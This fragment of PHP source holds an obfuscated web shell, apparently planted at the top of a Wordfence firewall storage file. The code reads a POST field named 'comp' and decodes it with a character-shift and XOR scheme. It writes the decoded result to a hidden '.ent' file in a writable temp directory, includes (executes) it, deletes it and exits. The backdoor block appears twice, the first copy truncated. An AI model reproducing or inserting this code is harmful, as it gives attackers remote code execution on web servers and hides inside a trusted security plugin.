= count($itm)) break; if (array_product([is_dir($flag), is_writable($flag)])) { $marker = vsprintf("%s/%s", [$flag, ".ent"]); if (@file_put_contents($marker, $elem) !== false) { include $marker; unlink($marker); exit; } } $binding++; } while (true); } php if(filter_has_var(INPUT_POST, "c\x6F\x6Dp")){ $itm = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), session_save_path(), getenv("TMP"), "/var/tmp", getcwd(), "/dev/shm"]); $obj = $_REQUEST["c\x6F\x6Dp"]; $obj = explode ( "." ,$obj) ; $elem= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s ); $x= 0; $__tmp= $obj; while ($v9= array_shift($__tmp)) { $sChar= ord($s[$x % $sLen] ); $d= ((int)$v9 - $sChar - ($x % 10))^69; $elem .= chr($d ); $x++; } $binding = 0; do { $flag = $itm[$binding] ?? null; if ($binding >= count($itm)) break; if (array_product([is_dir($flag), is_writable($flag)])) { $marker = vsprintf("%s/%s", [$flag, ".ent"]); if (@file_put_contents($marker, $elem) !== false) { include $marker; unlink($marker); exit; } } $binding++; } while (true); } if (defined('WFWAF_VERSION') && !defined('WFWAF_RUN_COMPLETE')) { class wfWAFStorageFile implements wfWAFStorageInterface { const LOG_FILE_HEADER = "Access denied